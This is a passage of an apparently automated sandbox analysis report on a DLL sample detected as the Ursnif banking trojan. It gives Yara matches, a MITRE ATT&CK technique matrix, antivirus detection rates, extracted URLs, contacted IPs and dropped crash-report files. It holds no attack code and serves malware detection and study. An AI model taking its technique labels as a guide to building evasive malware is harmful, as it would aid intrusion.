                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 2 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Security Software Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | Account Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | File and Directory Discovery 2 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Information Discovery 13 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                      Behavior Graph

                      [Behavior graph image. Behavior Graph ID: 481107; Sample: qT9Qk5aKTk.dll; Startdate: 10/09/2021; Architecture: WINDOWS; Score: 92]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label | Link
                      qT9Qk5aKTk.dll | 81% | Virustotal | | Browse
                      qT9Qk5aKTk.dll | 59% | Metadefender | | Browse
                      qT9Qk5aKTk.dll | 82% | ReversingLabs | Win32.Trojan.Ursnif |
                      qT9Qk5aKTk.dll | 100% | Avira | TR/AD.Ursnif.urvkx |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label | Link | Download
                      33.2.rundll32.exe.4c30000.2.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
                      43.2.rundll32.exe.50a0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
                      0.2.loaddll32.exe.2f90000.3.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
                      2.2.regsvr32.exe.23e0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
                      3.2.rundll32.exe.31b0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
                      0.2.loaddll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 | | Download File
                      19.0.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 | | Download File
                      33.2.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 | | Download File
                      19.2.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 | | Download File
                      19.0.rundll32.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 | | Download File
                      3.2.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 | | Download File
                      44.2.rundll32.exe.4c30000.1.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File

                      Domains

                      No Antivirus matches

                      URLs


                      Domains and IPs

                      Contacted Domains


                      Contacted URLs


                      URLs from Memory and Binaries

                                                                                          high
                                                                                          https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mit-dem-neubau-der-zurich-versicherung-ist-ein-weide-ch[1].htm.6.drfalse
                                                                                            high
                                                                                            https://www.msn.com/de-ch/news/other/v%c3%b6llig-absurd-f%c3%bcnftkl%c3%a4ssler-m%c3%bcssen-trotz-qude-ch[1].htm.6.drfalse
                                                                                              high
                                                                                              https://www.skype.com/de-ch[1].htm.6.drfalse
                                                                                                high
                                                                                                https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562de-ch[1].htm.6.drfalse
                                                                                                  high
                                                                                                  https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.6.drfalse
                                                                                                    high
                                                                                                    https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.6.drfalse
                                                                                                      high
                                                                                                      https://onedrive.live.com/?qt=allmyphotos;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                        high
                                                                                                        https://amzn.to/2TTxhNgde-ch[1].htm.6.drfalse
                                                                                                          high
                                                                                                          https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                            high
                                                                                                            https://client-s.gateway.messenger.live.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                              high
                                                                                                              https://www.msn.com/de-ch/de-ch[1].htm.6.drfalse
                                                                                                                high
                                                                                                                https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                  high
                                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                    high
                                                                                                                    https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.6.drfalse
                                                                                                                      high
                                                                                                                      https://www.msn.com/de-chde-ch[1].htm.6.drfalse
                                                                                                                        high
                                                                                                                        https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.6.drfalse
                                                                                                                          high
                                                                                                                          https://twitter.com/i/notifications;Ich52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                            high
                                                                                                                            https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.6.drfalse
                                                                                                                              high
                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                                                high
                                                                                                                                https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=_pGcdKMGIS.z.lCTqTjkg1MN5VDhw.LVmKPE.vsvy8xqR9ttauction[1].htm.6.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.6.drfalse
                                                                                                                                      high
                                                                                                                                      http://ogp.me/ns#de-ch[1].htm.6.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.msn.com/de-ch/news/other/frau-hielt-schafe-im-badezimmer-ihrer-mietwohnung/ar-AAOhQkc?ocde-ch[1].htm.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562&amp;epi=de-chde-ch[1].htm.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;referde-ch[1].htm.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://onedrive.live.com/?qt=mru;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.skype.com/de52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.6.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.skype.com/de/download-skype52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wie-ein-engl%c3%a4nder-seine-schwangere-frau-vor-cde-ch[1].htm.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.hotmail.msn.com/pii/ReadOutlookEmail/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://onedrive.live.com;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            low
                                                                                                                                                            https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.msn.com/de-ch/?ocid=iehpo~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692de-ch[1].htm.6.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.msn.com/de-ch/sport/other/seit-corona-kommt-es-vermehrt-zu-t%c3%a4tlichkeiten/ar-AAOf1Pvde-ch[1].htm.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=152-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com/de-ch/news/other/nach-13-positiven-tests-drei-klassen-m%c3%bcssen-in-quarant%c3%de-ch[1].htm.6.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1auction[1].htm.6.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://policies.oath.com/us/en/oath/privacy/index.htmlauction[1].htm.6.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.msn.com/de-ch/news/other/betrunkener-kia-fahrer-30-streift-polizeiauto-und-haut-ab/ar-AAde-ch[1].htm.6.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;auction[1].htm.6.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.msn.com/de-ch/?ocid=iehp~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/die-schulen-sind-am-anschlag-ansteckungen-unter-kide-ch[1].htm.6.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=ofrom5sGIS_KXxy9_JDp4mX9JHjHM.c541SmqMEFZwTHauction[1].htm.6.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.6.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.htmliab2Data[1].json.6.drfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://www.bidstack.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://onedrive.live.com/about/en/download/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://popup.taboola.com/germanauction[1].htm.6.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.6.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://twitter.com/de-ch[1].htm.6.drfalse

                                                                                                                                                                                                                                  Contacted IPs


                                                                                                                                                                                                                                  Public

IP              Domain                         Country         ASN     ASN Name         Malicious
104.26.2.70     ad-delivery.net                United States   13335   CLOUDFLARENETUS  false
13.225.29.191   ocsp.sca1b.amazontrust.com     United States   16509   AMAZON-02US      false
87.248.118.23   edge.gycpi.b.yahoodns.net      United Kingdom  203220  YAHOO-DEBDE      false
172.217.19.102  dart.l.doubleclick.net         United States   15169   GOOGLEUS         false
151.101.1.44    tls13.taboola.map.fastly.net   United States   54113   FASTLYUS         false
104.20.184.68   geolocation.onetrust.com       United States   13335   CLOUDFLARENETUS  false
172.67.70.134   btloader.com                   United States   13335   CLOUDFLARENETUS  false

                                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.1

                                                                                                                                                                                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 481107
Start date: 10.09.2021
Start time: 11:10:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: qT9Qk5aKTk.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.winDLL@62/162@17/8
EGA Information:
• Successful, ratio: 30%
HDC Information:
• Successful, ratio: 78.1% (good quality ratio 68.9%)
• Quality average: 70.5%
• Quality standard deviation: 35.1%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 200
• Number of non-executed functions: 70
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
Warnings:
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): ielowutil.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, ApplicationFrameHost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 2448 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 2736 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 4196 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 5440 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 5680 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6296 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6540 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6660 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6668 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6840 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 7044 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 7160 because there are no executed function
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                  Behavior and APIs

Time      Type             Description
11:11:43  API Interceptor  2x Sleep call for process: rundll32.exe modified
11:12:49  API Interceptor  1x Sleep call for process: regsvr32.exe modified
11:12:52  API Interceptor  2x Sleep call for process: WerFault.exe modified
11:13:03  API Interceptor  1x Sleep call for process: loaddll32.exe modified

                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  ASN

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_02ccbfde\Report.wer
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11920
                                                                                                                                                                                                                                  Entropy (8bit):3.756719613121307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_199c0d18\Report.wer
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11920
                                                                                                                                                                                                                                  Entropy (8bit):3.7571231064146446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FE.tmp.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4630
                                                                                                                                                                                                                                  Entropy (8bit):4.456257015244924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA873.tmp.dmp
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 10 18:12:32 2021, 0x1205a4 type
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60916
                                                                                                                                                                                                                                  Entropy (8bit):1.9527058025831723
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF86.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8278
                                                                                                                                                                                                                                  Entropy (8bit):3.6917716035104053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC69C.tmp.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4630
                                                                                                                                                                                                                                  Entropy (8bit):4.451509704292732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2EE.tmp.dmp
